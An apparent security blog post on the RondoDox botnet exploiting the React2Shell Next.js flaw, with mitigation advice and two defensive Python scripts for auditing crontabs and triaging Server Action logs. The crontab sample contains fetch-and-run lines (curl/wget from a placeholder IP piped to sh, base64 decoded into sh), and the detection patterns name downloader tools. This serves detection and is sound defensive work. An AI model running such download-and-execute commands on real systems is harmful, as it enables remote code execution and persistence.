RondoDox Botnet Now Exploits Critical React Flaw to Hijack Servers


According to Dark Reading, the threat actors behind the RondoDox botnet have begun exploiting the critical React2Shell vulnerability, tracked as CVE-2025-55182, as a new initial access vector. Researchers from CloudSEK and Rewterz observed this activity ramping up in December, targeting vulnerable Next.js servers to deploy cryptominers, a Mirai-based botnet variant, and aggressive loader modules. Rewterz estimates there are about 90,300 exposed instances of these vulnerable servers globally, with the majority in the US. The botnet, first discovered by Fortiguard Labs in May, has rapidly expanded to exploit nearly 60 flaws in routers, DVRs, and web servers. Its current campaign represents a significant threat to both enterprise web applications and IoT networks, with automated hourly exploitation attempts against corporate infrastructure.


How RondoDox Takes Over

Here’s the thing about React2Shell: it’s a prototype pollution vulnerability in React Server Components, reachable through Next.js Server Actions, that leads to remote code execution. Basically, if your server is unpatched and reachable from the internet, it’s game over. RondoDox is constantly scanning the internet for these open doors. Once it finds one, it doesn’t drop a single piece of malware. It deploys a whole suite: a cryptocurrency miner to monetize the hijacked compute power, a Mirai-based bot (hello, DDoS attacks), and a particularly nasty “health-check” loader component that acts like a digital bouncer.

This loader is brutal. It aggressively hunts down and kills any competing malware on the system every 45 seconds. It sets up cron jobs for persistence, so it comes back after a reboot. And it even tries to lock the door behind itself to prevent other threat groups from reinfecting the same machine. Talk about territorial. As detailed in CloudSEK’s analysis, this isn’t a simple script kiddie operation. It’s a sophisticated, multi-architecture threat deploying binaries for everything from standard x86 servers to embedded ARM and MIPS systems commonly found in IoT devices, using multiple download methods as fallbacks.
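The persistence and bouncer behaviour described above is exactly what a host audit should look for. The script below is an added example, not tooling from CloudSEK, Rewterz or Fortinet: it parses crontab text and flags entries that run from world-writable temp directories, fetch from bare-IP URLs, or pipe a download or base64 blob straight into a shell, and notes when a flagged entry also fires at high frequency or at boot. The heuristics are generic loader-persistence indicators rather than RondoDox indicators of compromise, and the sample crontab is constructed for the demo.

```python
"""Audit crontab entries for loader-style persistence.

Added example (not CloudSEK's, Rewterz's or Fortinet's tooling). The
heuristics are generic, not RondoDox-specific IoCs, and SAMPLE_CRONTAB
is constructed: three legitimate-looking entries and four suspicious ones.
"""
import re
from dataclasses import dataclass, field

# Constructed sample crontab (198.51.100.7 is an RFC 5737 documentation address).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
* * * * * /tmp/.x/healthcheck >/dev/null 2>&1
@reboot (curl -s http://198.51.100.7/dl.sh || wget -qO- http://198.51.100.7/dl.sh) | sh
*/2 * * * * echo aGVsbG8= | base64 -d | sh
30 4 * * 1 /dev/shm/.kworker --quiet
"""

# Each pattern is one indicator; an entry is reported when at least one fires.
SUSPICIOUS_PATHS = re.compile(r"(?:^|[\s(|;&])(?:/tmp|/dev/shm|/var/tmp)/")
IP_LITERAL_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da)?sh\b")
B64_DECODE = re.compile(r"base64\s+(?:-d|--decode)")
DOWNLOADER = re.compile(r"\b(?:curl|wget|tftp|ftpget)\b")


@dataclass
class Finding:
    line: str
    reasons: list[str] = field(default_factory=list)


def parse_entry(line):
    """Split one crontab line into (schedule, command); None for comments/blanks."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):  # @reboot, @hourly, ...
        sched, _, cmd = line.partition(" ")
        return sched, cmd.strip()
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def is_high_frequency(schedule):
    """True for @reboot, every-minute, or */N with N <= 5 in the minute field."""
    if schedule == "@reboot":
        return True
    minute = schedule.split()[0]
    if minute == "*":
        return True
    m = re.fullmatch(r"\*/(\d+)", minute)
    return bool(m and int(m.group(1)) <= 5)


def audit_crontab(text):
    """Return a Finding for every entry that trips at least one indicator.

    High frequency alone is not reported (plenty of legitimate jobs run every
    few minutes); it is added as context only when another indicator fired.
    """
    findings = []
    for raw in text.splitlines():
        entry = parse_entry(raw)
        if entry is None:
            continue
        schedule, cmd = entry
        reasons = []
        if SUSPICIOUS_PATHS.search(cmd):
            reasons.append("executes from a world-writable temp directory")
        if IP_LITERAL_URL.search(cmd):
            reasons.append("fetches from a bare IP-address URL")
        if DOWNLOADER.search(cmd) and PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes a download straight into a shell")
        if B64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
            reasons.append("decodes base64 into a shell")
        if reasons and is_high_frequency(schedule):
            reasons.append(f"runs at high frequency ({schedule})")
        if reasons:
            findings.append(Finding(raw.strip(), reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f.line)
        for reason in f.reasons:
            print("   -", reason)
```

In practice, feed it the output of `crontab -l` for every account (root included), plus `/etc/crontab` and the files under `/etc/cron.d/`, and treat any hit on a web server that was reachable through Server Actions as a reason to pull the box and image it rather than just delete the entry.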

Why This Expansion Matters

So why is this a big deal? RondoDox started life as a pretty standard IoT botnet, going after video recorders and routers. By adding a web application exploit to its toolkit, it’s bridging two worlds: it can punch through a company’s front door via an internet-exposed, unpatched Next.js server and then pivot laterally to the IoT devices on the internal network, whether that’s IP cameras, smart thermostats, or even specialized industrial hardware. For organizations that depend on that hardware for control and monitoring, this lateral movement is a nightmare scenario.

The botnet’s infrastructure, as also noted in Rewterz’s threat advisory, is designed for maximum impact and resilience. We’re looking at a persistent threat that automatically tries to exploit you every hour. The end goal? Enroll your devices into a botnet for DDoS attacks, turn your corporate servers into cryptomining rigs, or just use them as a foothold for further attacks. The original Fortiguard research showed its potential, and it’s clearly living up to it.

What Can You Do About It?

Mitigation sounds straightforward, but it requires diligence. First and most obvious: patch. If you’re running Next.js (or any React Server Components stack) with Server Actions, upgrade to the React and Next.js releases that fix CVE-2025-55182 immediately; a WAF signature buys you time, but it is not a fix. And that’s just the new front door. RondoDox exploits dozens of flaws, so continuous vulnerability scanning for all your internet-facing systems is non-negotiable.

Network segmentation is your best friend here. IoT devices should never be on the same flat network as your critical servers. Stick them in a dedicated VLAN with strict firewall rules. You should also deploy a Web Application Firewall (WAF) to block exploitation attempts and, for heaven’s sake, stop exposing admin panels and development servers directly to the internet. Finally, monitor for the tell-tale signs: suspicious unknown binaries, unexpected cron jobs, and traffic to known malicious command-and-control servers. It’s a cliché, but defense in layers is the only way to fight off a threat that itself operates on multiple layers.
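The monitoring advice above, and the hourly retry pattern noted earlier, can be turned into a concrete log check. The script below is an added example, not tooling from Dark Reading, CloudSEK or Rewterz. It relies on one documented Next.js convention: a Server Action is invoked with a POST that carries a `Next-Action` header holding the action ID. Everything else is an assumption for the demo: the JSON-lines log format and its field names are constructed, `KNOWN_ACTION_IDS` stands in for the set of action IDs your own build emits, and the IPs are RFC 5737 documentation addresses. The check flags any source that sprays action IDs your app never issued, or that keeps hitting a bogus ID on a fixed timer.

```python
"""Triage access logs for automated Next.js Server Action probing.

Added example; not tooling from Dark Reading, CloudSEK or Rewterz.
Assumptions: the log is JSON lines with the fields used below (a constructed
format); "next_action" holds the Next-Action request header that Next.js sets
on Server Action POSTs; KNOWN_ACTION_IDS is the set of action IDs your own
build emits (the values here are hypothetical).
"""
import json
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Hypothetical action IDs for this app; anything else is a probe.
KNOWN_ACTION_IDS = {"7f3a9c0e", "b81d2e44"}

# Constructed sample log. 203.0.113.10 is a real user; 192.0.2.55 sprays
# three made-up IDs in one burst; 198.51.100.7 retries one bogus ID hourly.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"ts": "2025-12-10T09:14:02Z", "ip": "203.0.113.10", "method": "POST", "path": "/checkout", "status": 200, "next_action": "7f3a9c0e"},
    {"ts": "2025-12-10T09:15:40Z", "ip": "203.0.113.10", "method": "GET", "path": "/checkout", "status": 200, "next_action": None},
    {"ts": "2025-12-10T11:47:19Z", "ip": "203.0.113.10", "method": "POST", "path": "/account", "status": 200, "next_action": "b81d2e44"},
    {"ts": "2025-12-10T14:02:11Z", "ip": "192.0.2.55", "method": "POST", "path": "/", "status": 500, "next_action": "aaaa0001"},
    {"ts": "2025-12-10T14:02:12Z", "ip": "192.0.2.55", "method": "POST", "path": "/", "status": 500, "next_action": "aaaa0002"},
    {"ts": "2025-12-10T14:02:12Z", "ip": "192.0.2.55", "method": "POST", "path": "/login", "status": 404, "next_action": "aaaa0003"},
    {"ts": "2025-12-11T00:00:05Z", "ip": "198.51.100.7", "method": "POST", "path": "/", "status": 500, "next_action": "0000000000000000"},
    {"ts": "2025-12-11T01:00:07Z", "ip": "198.51.100.7", "method": "POST", "path": "/", "status": 500, "next_action": "0000000000000000"},
    {"ts": "2025-12-11T02:00:04Z", "ip": "198.51.100.7", "method": "POST", "path": "/", "status": 500, "next_action": "0000000000000000"},
    {"ts": "2025-12-11T03:00:06Z", "ip": "198.51.100.7", "method": "POST", "path": "/", "status": 500, "next_action": "0000000000000000"},
])


def parse_log(text):
    """Parse JSON lines into dicts with an aware UTC datetime in "ts"."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        r = json.loads(line)
        r["ts"] = datetime.strptime(r["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        records.append(r)
    return records


def periodic(timestamps, min_count=3, max_cv=0.1):
    """True when >= min_count events arrive at a near-constant interval.

    Regularity is measured as the coefficient of variation of the gaps, so an
    hourly retry loop (gaps of ~3600 s) passes while a human burst does not.
    """
    if len(timestamps) < min_count:
        return False
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    if mean <= 0:
        return False
    return statistics.pstdev(gaps) / mean < max_cv


def triage(records, known_ids, unknown_threshold=3):
    """Per source IP: Server Action POST count, distinct unknown IDs, cadence, verdict."""
    per_ip = defaultdict(lambda: {"posts": 0, "unknown": set(), "times": []})
    for r in records:
        if r["method"] != "POST" or not r.get("next_action"):
            continue  # only Server Action invocations matter here
        s = per_ip[r["ip"]]
        s["posts"] += 1
        s["times"].append(r["ts"])
        if r["next_action"] not in known_ids:
            s["unknown"].add(r["next_action"])
    verdicts = {}
    for ip, s in per_ip.items():
        unknown = len(s["unknown"])
        is_periodic = periodic(s["times"])
        # Flag ID spraying, or one bogus ID hammered on a timer.
        verdicts[ip] = {
            "posts": s["posts"],
            "unknown_ids": unknown,
            "periodic": is_periodic,
            "flag": unknown >= unknown_threshold or (unknown > 0 and is_periodic),
        }
    return verdicts


if __name__ == "__main__":
    for ip, v in triage(parse_log(SAMPLE_LOG), KNOWN_ACTION_IDS).items():
        tag = "BLOCK" if v["flag"] else "ok"
        print(f"{ip:15} posts={v['posts']} unknown_ids={v['unknown_ids']} periodic={v['periodic']} {tag}")
```

Run it over a day of logs and push the flagged IPs to your edge block list; the point is to catch the probing cadence, not to parse exploit payloads, so it keeps working when the botnet rotates its request bodies. Unknown action IDs from a source that also only ever gets 4xx/5xx responses are a strong signal on their own, but patching remains the control that actually closes the hole.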
